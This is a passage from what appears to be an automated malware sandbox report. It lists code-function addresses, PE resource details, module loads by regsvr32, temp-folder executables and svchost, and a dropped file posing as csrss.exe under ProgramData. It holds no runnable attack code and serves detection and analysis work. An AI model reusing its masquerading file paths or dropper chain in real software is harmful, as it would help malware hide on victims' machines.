                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BEBB8214_2_04BEBB82
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BE858014_2_04BE8580
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BEC5F414_2_04BEC5F4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BEBD5014_2_04BEBD50
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BE144314_2_04BE1443
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BE164014_2_04BE1640
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BE8DB014_2_04BE8DB0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BE829014_2_04BE8290
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BEBFE014_2_04BEBFE0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BE10E014_2_04BE10E0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BE912014_2_04BE9120
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 14_2_04BECF1014_2_04BECF10
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_0040840C16_2_0040840C
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0048000218_2_00480002
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0048614018_2_00486140
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0043035418_2_00430354
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004444C018_2_004444C0
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004704C818_2_004704C8
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004345BC18_2_004345BC
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00444A6818_2_00444A68
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00430EE018_2_00430EE0
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0045EEEC18_2_0045EEEC
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0045AF9418_2_0045AF94
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004870A018_2_004870A0
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0044516018_2_00445160
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004671CC18_2_004671CC
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0046922C18_2_0046922C
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004352C018_2_004352C0
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0048D40018_2_0048D400
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0044556C18_2_0044556C
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0045199018_2_00451990
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_0043DD4818_2_0043DD48
                      Source: Joe Sandbox ViewDropped File: C:\ProgramData\Drivers\csrss.exe A1480E23BD2A89B188FB01138EF2F54130F2DC41CE85FF9319AB7F15471B0011
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 0040595C appears 116 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00403400 appears 61 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00406AB4 appears 41 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00445DCC appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 004344D4 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 0044609C appears 59 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00408BFC appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00457D3C appears 73 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00403494 appears 82 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 004078E4 appears 42 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00453318 appears 93 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00457B30 appears 94 times
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: String function: 00403684 appears 221 times
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeCode function: String function: 00401DE0 appears 32 times
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7620 -ip 7620
                      Source: 78A4.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 78A4.tmp.16.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: 78A4.tmp.16.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: 78A4.tmp.16.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                      Source: 78A4.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: 78A4.tmp.20.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: 78A4.tmp.20.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                      Source: is-2VNVT.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: is-2VNVT.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: is-2VNVT.tmp.21.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                      Source: BroomSetup.exe.30.drStatic PE information: Number of sections : 11 > 10
                      Source: is-P1HCF.tmp.21.drStatic PE information: Number of sections : 11 > 10
                      Source: is-7FTBB.tmp.21.drStatic PE information: Number of sections : 11 > 10
                      Source: is-5C03R.tmp.21.drStatic PE information: Number of sections : 11 > 10
                      Source: is-72Q7F.tmp.21.drStatic PE information: Number of sections : 11 > 10
                      Source: is-9633C.tmp.21.drStatic PE information: Number of sections : 11 > 10
                      Source: is-I193V.tmp.21.drStatic PE information: Number of sections : 11 > 10
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: csunsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: swift.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: nfhwcrhk.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: surewarehook.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: csunsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: aep.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: atasi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: swift.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: nfhwcrhk.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: nuronssl.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: surewarehook.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: ubsec.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: aep.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: atasi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: swift.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: nfhwcrhk.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: nuronssl.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: surewarehook.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: ubsec.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: comsvcs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: cmlua.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: cmutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mscms.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: clusapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: coloradapterclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: pcacli.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpSection loaded: sfc_os.dll
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: shfolder.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: msacm32.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: winmmbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: winmmbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: explorerframe.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: sfc.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
